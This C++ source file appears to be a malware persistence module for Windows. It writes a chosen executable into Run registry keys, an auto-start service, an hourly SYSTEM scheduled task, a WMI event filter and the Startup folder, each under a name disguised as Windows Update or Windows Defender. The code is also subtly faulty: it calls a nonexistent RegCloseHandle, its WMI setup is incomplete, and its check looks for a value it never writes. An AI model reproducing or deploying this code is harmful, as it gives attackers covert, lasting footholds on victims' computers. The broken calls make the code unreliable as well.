#include #include #include #include #include #include // Registry persistence methods bool install_registry_persistence(const std::wstring& executablePath) { HKEY hKey; LSTATUS status; // Current user run key status = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hKey); if (status == ERROR_SUCCESS) { status = RegSetValueEx(hKey, L"win-update-check", 0, REG_SZ, (const BYTE*)executablePath.c_str(), (executablePath.length() + 1) * sizeof(wchar_t)); RegCloseHandle(hKey); if (status == ERROR_SUCCESS) { return true; } } // Local machine run key (requires admin) status = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hKey); if (status == ERROR_SUCCESS) { status = RegSetValueEx(hKey, L"win-update-check-service", 0, REG_SZ, (const BYTE*)executablePath.c_str(), (executablePath.length() + 1) * sizeof(wchar_t)); RegCloseHandle(hKey); return status == ERROR_SUCCESS; } return false; } // Service persistence bool install_service_persistence(const std::wstring& executablePath) { SC_HANDLE hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); if (!hSCManager) return false; SC_HANDLE hService = CreateService( hSCManager, L"win-update-check", L"Windows Update Check Service", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, executablePath.c_str(), NULL, NULL, NULL, NULL, NULL ); if (!hService) { CloseServiceHandle(hSCManager); return false; } CloseServiceHandle(hService); CloseServiceHandle(hSCManager); return true; } // Scheduled task persistence bool install_scheduled_task(const std::wstring& executablePath) { std::wstring command = L"schtasks /create /tn \"win-update-check-task\" /tr \"" + executablePath + L"\" /sc hourly /ru SYSTEM"; int result = _wsystem(command.c_str()); return result == 0; } // WMI event subscription bool install_wmi_persistence(const std::wstring& executablePath) { std::wstring wmiCommand = L"wmic /namespace:\\\\root\\subscription PATH __EventFilter Create " L"Name=\"WinDefendFilter\", EventNameSpace=\"root\\cimv2\", " L"QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent " L"WITHIN 60 WHERE TargetInstance ISA 'Win32_Process' AND " L"TargetInstance.Name='svchost.exe'\""; return _wsystem(wmiCommand.c_str()) == 0; } // File system persistence (Startup folder) bool install_startup_persistence(const std::wstring& executablePath) { wchar_t startupPath[MAX_PATH]; if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_STARTUP, NULL, 0, startupPath))) { std::wstring shortcutPath = std::wstring(startupPath) + L"\\WindowsDefender.lnk"; // Create shortcut (this would require COM integration for proper shortcut creation) // For now, we'll copy the executable std::wstring targetPath = std::wstring(startupPath) + L"\\WindowsDefenderUpdate.exe"; return CopyFile(executablePath.c_str(), targetPath.c_str(), FALSE); } return false; } // Main persistence installation function bool install_persistence(const std::wstring& executablePath) { bool success = false; // Try multiple persistence methods if (install_registry_persistence(executablePath)) { success = true; } if (install_scheduled_task(executablePath)) { success = true; } if (install_startup_persistence(executablePath)) { success = true; } // Service persistence requires admin privileges if (IsUserAnAdmin()) { if (install_service_persistence(executablePath)) { success = true; } if (install_wmi_persistence(executablePath)) { success = true; } } return success; } // Check if already persistent bool check_persistence(const std::wstring& executablePath) { HKEY hKey; // Check registry if (RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { wchar_t buffer[MAX_PATH]; DWORD bufferSize = sizeof(buffer); if (RegGetValue(hKey, NULL, L"WindowsDefenderUpdate", RRF_RT_REG_SZ, NULL, buffer, &bufferSize) == ERROR_SUCCESS) { RegCloseHandle(hKey); return true; } RegCloseHandle(hKey); } return false; }